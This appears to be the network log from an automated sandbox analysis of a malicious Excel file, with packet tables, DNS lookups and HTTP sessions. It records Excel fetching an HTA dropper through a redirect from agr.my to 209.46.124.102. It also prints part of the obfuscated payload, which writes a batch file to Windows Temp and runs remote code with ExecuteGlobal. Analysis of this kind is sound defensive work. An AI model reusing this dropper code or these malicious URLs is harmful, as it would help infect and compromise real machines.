                      Mar 26, 2025 08:25:25.056518078 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.056545019 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.056565046 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.056581020 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.078149080 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.078176022 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.078227997 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.078264952 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.078279972 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.078421116 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.095247984 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.095278025 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.095324039 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.095335960 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.095362902 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.095377922 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.112341881 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.112375021 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.112410069 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.112426996 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.112448931 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.112467051 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.136467934 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.136497021 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.136550903 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.136578083 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.136591911 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.136615038 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.152457952 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.152486086 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.152533054 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.152566910 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.152585030 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.152600050 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.176780939 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.176810980 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.176853895 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.176877975 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.176899910 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.176915884 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.192159891 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.192181110 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.192223072 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.192270994 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.192308903 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.192331076 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.211101055 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.211124897 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.211173058 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.211208105 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.211225986 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.211240053 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.231219053 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.231246948 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.231324911 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.231353045 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.231368065 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.231465101 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.245440006 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.245467901 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.245532990 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.245564938 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.245594025 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.245727062 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.266622066 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.266644955 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.266695976 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.266707897 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.266730070 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.266750097 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.281940937 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.281964064 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.282025099 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.282058001 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.282083988 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.282104969 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.302386045 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.302428007 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.302474022 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.302506924 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.302520037 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.302567959 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.320662975 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.320739031 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.320774078 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.320822954 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.320837021 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.320887089 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.336508036 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.336618900 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.336673021 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.336694956 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.336725950 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.336863995 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.353346109 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.353364944 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.353452921 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.353460073 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.353566885 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.373711109 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.373764992 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.373800039 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.373814106 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.373835087 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.373857975 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.388092041 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.388119936 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.388159037 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.388171911 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.388185024 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.388210058 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.404329062 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.404357910 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.404397964 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.404417038 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.404428959 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.404499054 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.421825886 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.421853065 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.421902895 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.421916008 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.421935081 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.421952963 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.438108921 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.438138962 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.438200951 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.438209057 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.438239098 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.438261032 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.456892967 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.456923008 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.456967115 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.456998110 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.457014084 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.457046032 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.457106113 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.457216978 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.457324982 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.457344055 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:25.457355976 CET49700443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:25.457364082 CET4434970013.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:29.790548086 CET49701443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:29.790612936 CET4434970113.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:29.790730953 CET49701443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:29.790914059 CET49701443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:29.790926933 CET4434970113.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:29.793488026 CET49702443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:29.793525934 CET4434970213.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:29.793610096 CET49702443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:29.793809891 CET49702443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:29.793818951 CET4434970213.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:30.069916010 CET4434970113.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:30.070482969 CET49701443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:30.070508957 CET4434970113.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:30.071475983 CET49701443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:30.071481943 CET4434970113.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:30.075298071 CET4434970213.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:30.075670004 CET49702443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:30.075700045 CET4434970213.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:30.076752901 CET49702443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:30.076757908 CET4434970213.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:30.252604961 CET4434970113.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:30.252635956 CET4434970113.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:30.252695084 CET49701443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:30.252706051 CET4434970113.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:30.252748013 CET49701443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:30.253002882 CET49701443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:30.253024101 CET4434970113.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:30.253038883 CET49701443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:30.253046036 CET4434970113.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:30.256908894 CET4434970213.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:30.257090092 CET4434970213.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:30.257164955 CET49702443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:30.257411957 CET49702443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:30.257411957 CET49702443192.168.2.713.107.246.40
                      Mar 26, 2025 08:25:30.257426977 CET4434970213.107.246.40192.168.2.7
                      Mar 26, 2025 08:25:30.257435083 CET4434970213.107.246.40192.168.2.7
                      Mar 26, 2025 08:26:06.686335087 CET4969880192.168.2.7209.46.124.102
                      Mar 26, 2025 08:26:06.998692036 CET4969880192.168.2.7209.46.124.102
                      Mar 26, 2025 08:26:07.608078003 CET4969880192.168.2.7209.46.124.102
                      Mar 26, 2025 08:26:08.811157942 CET4969880192.168.2.7209.46.124.102
                      Mar 26, 2025 08:26:11.217420101 CET4969880192.168.2.7209.46.124.102
                      Mar 26, 2025 08:26:16.030119896 CET4969880192.168.2.7209.46.124.102
                      Mar 26, 2025 08:26:25.639389038 CET4969880192.168.2.7209.46.124.102
                      TimestampSource PortDest PortSource IPDest IP
                      Mar 26, 2025 08:25:07.776308060 CET5687153192.168.2.71.1.1.1
                      Mar 26, 2025 08:25:07.895761967 CET53568711.1.1.1192.168.2.7
                      Mar 26, 2025 08:25:23.161052942 CET5516553192.168.2.71.1.1.1
                      Mar 26, 2025 08:25:23.258398056 CET53551651.1.1.1192.168.2.7
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Mar 26, 2025 08:25:07.776308060 CET192.168.2.71.1.1.10xfa19Standard query (0)agr.myA (IP address)IN (0x0001)false
                      Mar 26, 2025 08:25:23.161052942 CET192.168.2.71.1.1.10x2f47Standard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Mar 26, 2025 08:24:18.057040930 CET1.1.1.1192.168.2.70x4281No error (0)ecs-office.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                      Mar 26, 2025 08:24:18.057040930 CET1.1.1.1192.168.2.70x4281No error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
                      Mar 26, 2025 08:24:18.057040930 CET1.1.1.1192.168.2.70x4281No error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
                      Mar 26, 2025 08:25:07.895761967 CET1.1.1.1192.168.2.70xfa19No error (0)agr.my147.79.86.93A (IP address)IN (0x0001)false
                      Mar 26, 2025 08:25:23.258398056 CET1.1.1.1192.168.2.70x2f47No error (0)otelrules.svc.static.microsoftotelrules-bzhndjfje8dvh5fd.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                      Mar 26, 2025 08:25:23.258398056 CET1.1.1.1192.168.2.70x2f47No error (0)otelrules-bzhndjfje8dvh5fd.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                      Mar 26, 2025 08:25:23.258398056 CET1.1.1.1192.168.2.70x2f47No error (0)star-azurefd-prod.trafficmanager.netshed.dual-low.s-part-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                      Mar 26, 2025 08:25:23.258398056 CET1.1.1.1192.168.2.70x2f47No error (0)shed.dual-low.s-part-0012.t-0009.t-msedge.nets-part-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                      Mar 26, 2025 08:25:23.258398056 CET1.1.1.1192.168.2.70x2f47No error (0)s-part-0012.t-0009.t-msedge.net13.107.246.40A (IP address)IN (0x0001)false
                      • agr.my
                      • otelrules.svc.static.microsoft
                      • 209.46.124.102
                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.749698209.46.124.102807144C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      TimestampBytes transferredDirectionData
                      Mar 26, 2025 08:25:08.952158928 CET257OUTGET /xampp/nicehome/goodgirlwithbestbattingwithgoodthings.hta?&bagpipe HTTP/1.1
                      Accept: */*
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Connection: Keep-Alive
                      Host: 209.46.124.102
                      Mar 26, 2025 08:25:09.070231915 CET1254INHTTP/1.1 200 OK
                      Date: Wed, 26 Mar 2025 07:25:09 GMT
                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                      Last-Modified: Wed, 26 Mar 2025 06:34:31 GMT
                      ETag: "c9e-6313907aa7b9e"
                      Accept-Ranges: bytes
                      Content-Length: 3230
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: application/hta
                      Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 25 32 31 44 4f 43 54 59 50 45 25 32 30 68 74 6d 6c 25 33 45 25 30 41 25 33 43 68 74 6d 6c 25 33 45 25 30 41 25 33 43 68 65 61 64 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 74 69 74 6c 65 25 33 45 45 78 65 63 75 74 61 72 25 32 30 53 63 72 69 70 74 25 33 43 2f 74 69 74 6c 65 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 48 54 41 25 33 41 41 50 50 4c 49 43 41 54 49 4f 4e 25 32 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 41 50 50 4c 49 43 41 54 49 4f 4e 4e 41 4d 45 25 33 44 25 32 32 53 63 72 69 70 74 45 78 65 63 75 74 6f 72 25 32 32 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 42 4f 52 44 45 52 25 33 44 25 32 32 6e 6f 6e 65 25 32 32 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 43 41 50 54 49 4f 4e 25 33 44 25 32 32 6e 6f 25 32 [TRUNCATED]
                      Data Ascii: <script>...document.write(unescape("%3C%21DOCTYPE%20html%3E%0A%3Chtml%3E%0A%3Chead%3E%0A%20%20%20%20%3Ctitle%3EExecutar%20Script%3C/title%3E%0A%20%20%20%20%3CHTA%3AAPPLICATION%20%0A%20%20%20%20%20%20%20%20APPLICATIONNAME%3D%22ScriptExecutor%22%0A%20%20%20%20%20%20%20%20BORDER%3D%22none%22%0A%20%20%20%20%20%20%20%20CAPTION%3D%22no%22%0A%20%20%20%20%20%20%20%20SHOWINTASKBAR%3D%22no%22%0A%20%20%20%20%20%20%20%20SINGLEINSTANCE%3D%22yes%22%0A%20%20%20%20%20%20%20%20WINDOWSTATE%3D%22minimize%22%0A%20%20%20%20/%3E%0A%20%20%20%20%3Cscript%20language%3D%22VBScript%22%3E%0A%20%20%20%20%20%20%20%20Dim%20lepismid%0A%20%20%20%20%20%20%20%20Set%20lepismid%20%3D%20CreateObject%28%22WScript.Shell%22%29%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20Dim%20sternebral%0A%20%20%20%20%20%20%20%20sternebral%20%3D%20%22C%3A%5CWindows%5CTemp%5Chorripilant.bat%22%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20Dim%20thermal%2C%20grec
                      Mar 26, 2025 08:25:09.070260048 CET1254INData Raw: 6f 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 53 65 74 25 32 30 74 68 65 72 6d 61 6c 25 32 30 25 33 44 25 32 30 43 72 65 61 74 65 4f 62 6a 65 63 74 25 32 38 25 32 32 53 63 72 69 70 74 69 6e 67 2e 46 69 6c 65
                      Data Ascii: o%0A%20%20%20%20%20%20%20%20Set%20thermal%20%3D%20CreateObject%28%22Scripting.FileSystemObject%22%29%0A%20%20%20%20%20%20%20%20Set%20greco%20%3D%20thermal.CreateTextFile%28sternebral%2C%20True%29%0A%0A%20%20%20%20%20%20%20%20Dim%20gainsaying%0
                      Mar 26, 2025 08:25:09.070281029 CET1038INData Raw: 32 30 25 32 35 66 75 67 75 65 73 25 32 35 25 32 32 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 67 72 65 63 6f 2e 57 72 69 74 65 4c 69 6e 65 25 32 30 25 32 32 65 63 68 6f 25 32 30 49 66 25 32 30 64 6f 63 75 6d
                      Data Ascii: 20%25fugues%25%22%0A%20%20%20%20%20%20%20%20greco.WriteLine%20%22echo%20If%20documentarist.Status%20%3D%20200%20Then%20%3E%3E%20%25fugues%25%22%0A%20%20%20%20%20%20%20%20greco.WriteLine%20%22echo%20%20%20%20%20ExecuteGlobal%20documentarist.res


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.749697147.79.86.934437144C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      TimestampBytes transferredDirectionData
                      2025-03-26 07:25:08 UTC199OUTGET /mSGalN?&morning HTTP/1.1
                      Accept: */*
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: agr.my
                      Connection: Keep-Alive
                      2025-03-26 07:25:08 UTC469INHTTP/1.1 302 Found
                      Content-Length: 109
                      Content-Type: text/plain; charset=utf-8
                      Date: Wed, 26 Mar 2025 07:25:08 GMT
                      Location: http://209.46.124.102/xampp/nicehome/goodgirlwithbestbattingwithgoodthings.hta?&bagpipe
                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                      Vary: Accept
                      X-Content-Type-Options: nosniff
                      X-Dns-Prefetch-Control: off
                      X-Download-Options: noopen
                      X-Frame-Options: SAMEORIGIN
                      X-Xss-Protection: 1; mode=block
                      Connection: close
                      2025-03-26 07:25:08 UTC109INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 30 39 2e 34 36 2e 31 32 34 2e 31 30 32 2f 78 61 6d 70 70 2f 6e 69 63 65 68 6f 6d 65 2f 67 6f 6f 64 67 69 72 6c 77 69 74 68 62 65 73 74 62 61 74 74 69 6e 67 77 69 74 68 67 6f 6f 64 74 68 69 6e 67 73 2e 68 74 61 3f 26 62 61 67 70 69 70 65
                      Data Ascii: Found. Redirecting to http://209.46.124.102/xampp/nicehome/goodgirlwithbestbattingwithgoodthings.hta?&bagpipe


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.74970013.107.246.404437144C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      TimestampBytes transferredDirectionData
                      2025-03-26 07:25:23 UTC226OUTGET /rules/excel.exe-Production-v19.bundle HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                      Host: otelrules.svc.static.microsoft
                      2025-03-26 07:25:23 UTC493INHTTP/1.1 200 OK
                      Date: Wed, 26 Mar 2025 07:25:23 GMT
                      Content-Type: text/plain
                      Content-Length: 1114783
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public
                      Last-Modified: Mon, 24 Mar 2025 13:40:54 GMT
                      ETag: "0x8DD6AD97FEF19EF"
                      x-ms-request-id: ebdb26f1-701e-000d-2b05-9e6de3000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20250326T072523Z-17cccd5449bhkn97hC1EWRp7ew0000000fxg00000000a7rm
                      x-fd-int-roxy-purgeid: 0
                      X-Cache-Info: L1_T2
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2025-03-26 07:25:23 UTC15891INData Raw: 31 30 30 30 34 32 76 32 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 34 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 55 58 2e 44 65 73 6b 74 6f 70 2e 4f 66 66 69 63 65 54 68 65 6d 65 2e 41 70 70 2e 49 6e 69 74 22 20 41 54 54 3d 22 63 34 33 38 38 63 39 37 37 32 39 37 34 31 33 62 62 30 35 34 62 61 64 31 61 63 66 30 61 64 65 31 2d 63 63 35 38 65 35 33 65 2d 66 35 61 34 2d 34 66 33 37 2d 62 30 64 32 2d 39 61 38 30 37 39 65 33 34 34 32 30 2d 36 38 37 39 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 63 6d 39 79 35
                      Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
                      2025-03-26 07:25:23 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 30 31 31 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 31 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 38 79 6c 6c 66 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 56 20 56 3d 22 43 6c 69 63 6b 22 20 54 3d 22 57 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32
                      Data Ascii: /> </T></R><$!#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T="W" I="0" O="false"> <V V="Click" T="W" /> </C> <C T="U32
